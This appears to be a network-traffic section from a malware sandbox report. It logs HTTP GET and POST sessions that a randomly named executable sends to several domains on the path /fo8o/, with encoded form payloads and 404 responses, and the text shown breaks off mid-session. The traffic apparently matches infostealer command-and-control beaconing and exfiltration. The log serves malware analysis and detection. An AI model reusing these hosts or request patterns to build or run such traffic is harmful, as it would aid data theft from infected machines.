                                                                                      0192.168.2.949782154.215.72.110804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:43:37.605808973 CET506OUTGET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.3xfootball.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:43:39.115890980 CET691INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 06 Dec 2024 16:43:38 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.949844116.50.37.244804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:44:03.566926003 CET789OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Origin: http://www.goldenjade-travel.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 194
                                                                                      Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 50 50 79 59 69 4b 42 38 36 6c 7a 63 5a 6b 61 77 50 58 34 75 59 6e 62 56 47 42 5a 47
                                                                                      Data Ascii: LzY4r=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPyYiKB86lzcZkawPX4uYnbVGBZG
                                                                                      Dec 6, 2024 17:44:05.090445995 CET492INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Fri, 06 Dec 2024 16:44:04 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.949850116.50.37.244804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:44:06.225018024 CET813OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Origin: http://www.goldenjade-travel.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 218
                                                                                      Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 62 79 42 6d 51 75 41 5a 72 6a 4d 6e 42 58 6e 43 59 61 2f 42 55 43 78 71 63 36 6e 51 3d 3d
                                                                                      Data Ascii: LzY4r=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwbyBmQuAZrjMnBXnCYa/BUCxqc6nQ==
                                                                                      Dec 6, 2024 17:44:07.748866081 CET492INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Fri, 06 Dec 2024 16:44:06 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.949856116.50.37.244804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:44:08.879355907 CET1826OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Origin: http://www.goldenjade-travel.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1230
                                                                                      Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 33 4e 5a 52 78 6e 6e 4c 6d 38 7a 47 66 75 46 57 32 35 65 38 33 59 2f 75 7a 4e 41 38 70 59 79 36 61 70 35 31 77 37 47 76 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 77 4e 46 47 67 41 5a 53 49 78 6b 7a 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a [TRUNCATED]
                                                                                      Data Ascii: LzY4r=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZRxnnLm8zGfuFW25e83Y/uzNA8pYy6ap51w7GvYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZSIxkzfgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB4QpOPRMWcky42D/oIJ1pT3UmuK2Az5QXmbpeyX1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7rIVVF2LUcy6eXP9nkfrU7Xe0LSzMQUjipgC0OFC+ysq4gVMyzhAUv5wjigzPxGkCcwpVY3ioHjiiFIvQ6AR1C7nWpC0AbLbINrRZBo41FGochAMd9lLXnbOPtkcducNwDuKC5wB0AP1f84YZ09258fuYuufGt2tOv07EEjip0f+IC43q6hgqJy7WG5UaAFhRSCFL8fJB811ZdR99dj673g9HYGAaYvS8sc4vB6QuIH5qotHd7tq24kPraiFJorMXFFxGOlPCb6OycxWPuXwhqxek4SDhtziKvovtMg55GjL2IKTMziObUwwUdR72sIEtpAkWNkAqTIJpkHg4uqwAv6mr+TD8UEUhA4XPI/CgSFc5Fh2kFsQDETr4Qh/BCHSAZhAb5fku4D+LTGrHaaeFgmhC6DQ5MMMB8tGzkJkV2rquBdNV6Cr6Yfio2aU+9xpBC1sUoqK3ZE/bsJ37X0QG5RyrK4VxqWwZyq+u6XHJBDkdRUrdBIcbcSD64dfRpK5Q1KR/hyTPVIyW3xQC [TRUNCATED]
                                                                                      Dec 6, 2024 17:44:10.415050983 CET492INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Fri, 06 Dec 2024 16:44:09 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.949865116.50.37.244804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:44:11.536209106 CET513OUTGET /fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:44:13.060348034 CET492INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Fri, 06 Dec 2024 16:44:11 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.94990185.159.66.93804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:44:26.968638897 CET768OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.magmadokum.com
                                                                                      Origin: http://www.magmadokum.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 194
                                                                                      Referer: http://www.magmadokum.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 31 32 43 52 61 72 5a 65 62 51 36 71 65 47 52 36 62 73 5a 56 37 75 7a 35 56 43 53 66
                                                                                      Data Ascii: LzY4r=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R12CRarZebQ6qeGR6bsZV7uz5VCSf


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.94990885.159.66.93804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:44:29.619647026 CET792OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.magmadokum.com
                                                                                      Origin: http://www.magmadokum.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 218
                                                                                      Referer: http://www.magmadokum.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 7a 65 53 6c 62 33 4c 44 47 4d 32 32 4a 6f 37 54 73 7a 78 48 50 78 76 45 65 4b 35 51 3d 3d
                                                                                      Data Ascii: LzY4r=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5zeSlb3LDGM22Jo7TszxHPxvEeK5Q==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.94991585.159.66.93804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:44:32.277421951 CET1805OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.magmadokum.com
                                                                                      Origin: http://www.magmadokum.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1230
                                                                                      Referer: http://www.magmadokum.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
